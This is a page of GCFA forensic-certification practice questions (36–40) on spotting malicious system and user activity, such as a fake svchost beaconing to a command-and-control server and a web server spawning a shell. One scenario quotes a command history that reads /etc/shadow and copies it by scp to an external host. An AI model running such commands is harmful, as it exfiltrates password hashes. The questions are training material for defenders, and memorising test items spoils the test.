Examers.io
ExamsOrganizationsHow it worksPricingHelp & FAQ
GIAC (SANS) logo

GIAC Certified Forensic Analyst

Domain 5Objective 2

Identification of Malicious System and User Activity GCFA Practice Questions (Page 8)

Part of the Activity Analysis domain, which makes up ~18% of our current practice bank. GIAC (SANS) does not publish an official question count, but from its 180-minute exam (~70–120 total, ~13–22 in this domain), expect 7–11 from this objective — we provide 40 practice questions to prepare you well beyond it. (estimate)

40questions here
8free pages
3concepts

Questions 36–40

  1. 36foundation · easy

    A forensic analyst is reviewing file access logs and notices that a user account, which normally accesses only marketing documents, suddenly accessed a large number of files in the HR directory and then copied them to a USB drive. Which malicious user activity does this behavior most directly indicate?

    Select an answer first
  2. 37application · medium

    A forensic analyst is monitoring a production server. They notice that a process named 'svchost.exe' is making repeated connections to an IP address known to be a command-and-control server. The process's command line includes '-k netsvcs' which is normal, but the binary path is C:\Windows\Temp\svchost.exe. What should the analyst do?

    Select an answer first
  3. 38application · medium

    A forensic analyst is reviewing a Linux server's audit logs. They notice a series of syscalls from a process named 'httpd' that include 'connect()' to a non-standard port on an internal IP, followed by 'execve()' of '/bin/sh'. The process's parent is PID 1 (init). The web server's normal behavior does not include outbound connections. What should the analyst conclude?

    Select an answer first
  4. 39application · medium

    A user's account shows multiple failed logon attempts, followed by a successful logon at 3:00 AM, and then a large file transfer to an external FTP server. Which pattern of malicious user activity does this represent?

    Select an answer first
  5. 40application · medium

    An analyst is reviewing a user's command history. The user 'asmith' ran the following commands in sequence: 'sudo su -', 'cat /etc/shadow', 'scp /etc/shadow user@external-ip:/tmp/'. The user is a junior administrator with no need to access the shadow file. What does this indicate?

    Select an answer first
Finished these 5 questions?

Review the revealed explanations, or continue through the curriculum.

No more pagesBack to GCFA

Free Basic Practice is a study aid with revealable answers — not a scored exam. Examers.io is independent and not affiliated with or endorsed by GIAC (SANS). “GCFA” is a trademark of its owner, used for identification only.